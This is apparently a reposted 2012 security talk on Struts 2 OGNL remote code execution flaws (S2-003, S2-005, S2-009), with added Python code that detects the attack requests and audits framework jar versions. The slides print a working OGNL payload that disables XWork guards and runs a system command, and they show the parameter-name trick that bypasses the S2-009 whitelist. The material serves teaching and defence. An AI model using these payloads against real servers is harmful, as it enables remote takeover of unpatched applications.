Advanced Web Security

dewberryevent, category: Security

2 Nov 2013

465 views

Tel +41 55-214 41 60
Fax +41 55-214 41 61
team@csnc.ch
www.csnc.ch
Compass Security AG
Glärnischstrasse 7
Postfach 1628
CH-8640 Rapperswil
Advanced Web Security
Philipp Oesch
01.03.2012
© Compass Security AG
Agenda
- New Challenges Today
- Risks with Open Source & Standard Frameworks
- Live Hacking Demo – Struts 2
- Recommendations
- Live Hacking Demo – (XXE & MySQL UDF)
- New HTTP Headers
Technology Stack Today
Competence / Responsibilities

Development
- Programming of applications
- Bugfixing of applications

Operations
- Deployment in the productive environment
- Backup & logging
- System updates
  - Operating system
  - Installed software
- System hardening

But who is responsible for:
- Secure configuration of the frameworks in use
- Updating/patching the frameworks and libraries in use
- Overall security
Don’t forget to patch the framework
Framework libraries are often forgotten in the update process!
Struts 2 Framework - OGNL INTRO
But it is also possible to execute Java code. The first two assignments switch off the XWork guards (method execution is no longer denied, static method access is allowed); the third then calls a static method on the server's JVM:

<s:property value="(
  #context[\"xwork.MethodAccessor.denyMethodExecution\"] = new java.lang.Boolean(false),
  #_memberAccess[\"allowStaticMethodAccess\"] = new java.lang.Boolean(true),
  @java.lang.Runtime@getRuntime().exec('calc.exe')
)"/>
Struts 2 - Vulnerabilities
Struts 2 - Live Hacking Demo

POST https://ebanking.hacking-lab.com/Login.action
  Malicious_OGNL_Expression=true
  username=Oesch

The ParametersInterceptor treats every parameter name as an OGNL property to set, i.e. it performs
  LoginBean.set<Malicious_OGNL_Expression>('true')

Remote Code Execution Vulnerability S2-003 / S2-005
Malicious_OGNL_Expression is executed and can:
- access the user session!
- execute arbitrary code on the server!
Struts 2 - Live Hacking Demo

Vulnerability S2-003 (Struts 2.0.0 - Struts 2.0.11.2)
- Problem: malicious OGNL expression in parameter name
- Patch: regexp for allowed parameter names (whitelist)
The whitelist was not restrictive enough -> S2-005!

Vulnerability S2-005 (Struts 2.0.0 - Struts 2.1.8.1)
- Problem: malicious OGNL expression in parameter name
- Patch: improved regexp for allowed parameter names (whitelist)
A malicious OGNL expression in the parameter name was no longer possible, but remote code execution still was -> S2-009!
Struts 2 - Live Hacking Demo

POST https://ebanking.hacking-lab.com/Login.action
  password=Malicious_OGNL_Expression
  top['password'](0)=true

The interceptor performs
  LoginBean.setPassword('Malicious_OGNL_Expression')
  LoginBean.set top['password'](0) ('true')

Remote Code Execution Vulnerability S2-009
WhitelistPattern=[a-zA-Z0-9\.\]\[\(\)_']+

The parameter name top['password'](0) passes this whitelist and is a valid OGNL expression: it evaluates the value of the parameter password, which is already on the Action Context stack!
Malicious_OGNL_Expression is executed!
Remote Code Execution!
Struts 2 – Source Code Check

Comparing the source code:
- Vulnerable version (S2-009): Struts 2.3.1.1 / ognl 3.0.3 / xwork-core 2.3.1.1
- The following pattern was used to filter attack strings in attribute names:
  Pattern = [a-zA-Z0-9\.\]\[\(\)_']+
- Attack string in parameter name:
  top['password'](0)
- Current version: Struts 2.3.1.2 / ognl 3.0.4 / xwork-core 2.3.1.2
- The pattern for attribute names changed:
  New Pattern = \w+((\.\w+)|(\[\d+\])|(\(\d+\))|(\['\w+'\])|(\('\w+'\)))*
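The two demo requests above (the S2-003/S2-005 request with the expression in the parameter name, and the S2-009 request that smuggles it through the password value) can be checked against the two whitelist patterns from the slides. The following Python is an added example written for this page; it is neither Compass Security's demo code nor the Struts ParametersInterceptor itself. The two regexes are the slides'; the indicator strings, the sample request bodies and the `analyse_body` logic are constructed for the example and are a simplification of the interceptor's name check, not a port of it.

```python
import re
from urllib.parse import parse_qsl, quote

# Parameter-name whitelist of Struts 2.3.1.1 / xwork-core 2.3.1.1 (S2-009 era), from the slide.
OLD_ACCEPTED = re.compile(r"[a-zA-Z0-9\.\]\[\(\)_']+")
# Stricter name pattern of Struts 2.3.1.2 / xwork-core 2.3.1.2, from the slide.
NEW_ACCEPTED = re.compile(r"\w+((\.\w+)|(\[\d+\])|(\(\d+\))|(\['\w+'\])|(\('\w+'\)))*")

# Marker strings every payload on the slides contains (this example's list, not Struts').
VALUE_INDICATORS = ("#context", "#_memberAccess", "@java.lang.Runtime@",
                    "denyMethodExecution", "allowStaticMethodAccess")
# Characters a plain property path such as loginBean.username never needs.
NAME_METACHARS = set("()#@'\"=,")

# Constructed payload in the shape shown on the OGNL intro slide.
PAYLOAD = ("(#context['xwork.MethodAccessor.denyMethodExecution']=false,"
           "#_memberAccess['allowStaticMethodAccess']=true,"
           "@java.lang.Runtime@getRuntime().exec('calc.exe'))")

# Constructed sample POST bodies for the two demos and a benign login.
S2_005_BODY = "username=Oesch&" + quote(PAYLOAD, safe="") + "=true"
S2_009_BODY = ("password=" + quote(PAYLOAD, safe="") + "&"
               + quote("top['password'](0)", safe="") + "=true")
BENIGN_BODY = "username=Oesch&password=secret&remember=1"


def name_accepted(name, pattern):
    """True if the whole parameter name satisfies the whitelist (like Java's matches())."""
    return pattern.fullmatch(name) is not None


def analyse_body(body):
    """Return (parameter name, reason) findings for one URL-encoded POST body."""
    params = parse_qsl(body, keep_blank_values=True)
    names = {n for n, _ in params}
    findings = []
    for name, value in params:
        if NAME_METACHARS & set(name):
            findings.append((name, "OGNL metacharacter in parameter name"))
        if any(ind in value for ind in VALUE_INDICATORS):
            findings.append((name, "OGNL payload indicator in value"))
        # S2-009 shape: top['x'](0) re-evaluates the value of parameter x as OGNL.
        m = re.fullmatch(r"top\['(\w+)'\]\(\d+\)", name)
        if m and m.group(1) in names:
            findings.append((name, "S2-009 pattern: re-evaluates parameter %r" % m.group(1)))
    return findings


if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("S2-005", S2_005_BODY), ("S2-009", S2_009_BODY)):
        print(label)
        for name, _ in parse_qsl(body, keep_blank_values=True):
            print("  name %r old:%s new:%s" % (name[:40], name_accepted(name, OLD_ACCEPTED),
                                               name_accepted(name, NEW_ACCEPTED)))
        for finding in analyse_body(body):
            print("  FINDING", finding)
```

Running it shows the S2-009 name passing the S2-009-era whitelist while the S2-005-style name is rejected by it, which is exactly the bypass the slide describes. It also shows that top['password'](0) satisfies the stricter 2.3.1.2 pattern as well; since the upgrade is what closes S2-009, the protection cannot rest on the name regex alone, so a WAF or log rule should inspect parameter values for the payload's marker strings as analyse_body does, rather than only validating the shape of names.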
Upgrade to Struts 2.3.1.2.
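The slides' point that framework libraries are forgotten in the update process, together with the recommendation to move to Struts 2.3.1.2, can be turned into a routine check of a deployment's WEB-INF/lib. The following Python is an added example for this page, not Compass Security's tooling: it parses jar file names, compares the struts2-core version against the inclusive affected ranges of S2-003 and S2-005 as given on the slides and of S2-009 (2.0.0 - 2.3.1.1, from the advisory cited in the references), and flags struts2-core, xwork-core and ognl below the 2.3.1.2 / 2.3.1.2 / 3.0.4 baseline named on the source-code-check slide. The directory listing is constructed, and the artifact-version.jar naming convention is an assumption.

```python
import os
import re
import sys

# Inclusive affected ranges: S2-003 and S2-005 from the slides, S2-009 from the advisory.
STRUTS_ADVISORIES = (
    ("S2-003", (2, 0, 0), (2, 0, 11, 2)),
    ("S2-005", (2, 0, 0), (2, 1, 8, 1)),
    ("S2-009", (2, 0, 0), (2, 3, 1, 1)),
)
# Baseline after the S2-009 fix: Struts 2.3.1.2 / xwork-core 2.3.1.2 / ognl 3.0.4 (from the slide).
MIN_FIXED = {"struts2-core": (2, 3, 1, 2), "xwork-core": (2, 3, 1, 2), "ognl": (3, 0, 4)}

# Assumed naming convention: <artifact>-<version>.jar
JAR_RE = re.compile(r"^(?P<artifact>[a-z][a-z0-9-]*?)-(?P<version>\d+(?:\.\d+)*)\.jar$")

# Constructed listing of a deployment still on the versions the S2-009 demo targets.
SAMPLE_LIB = ["struts2-core-2.3.1.1.jar", "xwork-core-2.3.1.1.jar", "ognl-3.0.3.jar",
              "commons-lang-2.5.jar", "README.txt"]


def parse_version(text):
    """'2.3.1.1' -> (2, 3, 1, 1); tuples compare the way release numbers do."""
    return tuple(int(p) for p in text.split("."))


def parse_jar(filename):
    """Return (artifact, version tuple) for an artifact-version.jar name, else None."""
    m = JAR_RE.match(filename)
    if not m:
        return None
    return m.group("artifact"), parse_version(m.group("version"))


def affected_advisories(struts_version):
    """Advisory ids whose inclusive affected range contains the struts2-core version."""
    return [sid for sid, low, high in STRUTS_ADVISORIES if low <= struts_version <= high]


def audit_lib(filenames):
    """Map each tracked artifact in a lib listing to its version, advisories and patch status."""
    report = {}
    for filename in filenames:
        parsed = parse_jar(filename)
        if parsed is None or parsed[0] not in MIN_FIXED:
            continue
        artifact, version = parsed
        report[artifact] = {
            "version": ".".join(map(str, version)),
            "outdated": version < MIN_FIXED[artifact],
            "advisories": affected_advisories(version) if artifact == "struts2-core" else [],
        }
    return report


def audit_dir(path):
    """Audit a real WEB-INF/lib directory."""
    return audit_lib(os.listdir(path))


if __name__ == "__main__":
    listing = os.listdir(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_LIB
    for artifact, entry in sorted(audit_lib(listing).items()):
        status = "PATCH" if entry["outdated"] else "ok"
        print("%-13s %-10s %-5s %s" % (artifact, entry["version"], status,
                                       " ".join(entry["advisories"])))
```

Run without arguments it audits the constructed listing; with a path it audits that directory. Because operations teams patch the OS and developers patch their own code, a check like this belongs in the build or deployment pipeline, where neither side can overlook the framework jars.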
Struts2 Metasploit Module
http://www.metasploit.com/modules/exploit/multi/http/struts_code_exec
How to protect?
XXE UDF - Live Hacking Demo
Visit: http://blog.csnc.ch
Thank You
References
http://struts.apache.org/2.2.1/docs/s2-003.html
http://struts.apache.org/2.2.1/docs/s2-005.html
http://struts.apache.org/2.x/docs/s2-009.html
http://blog.csnc.ch/2012/01/new-http-headers/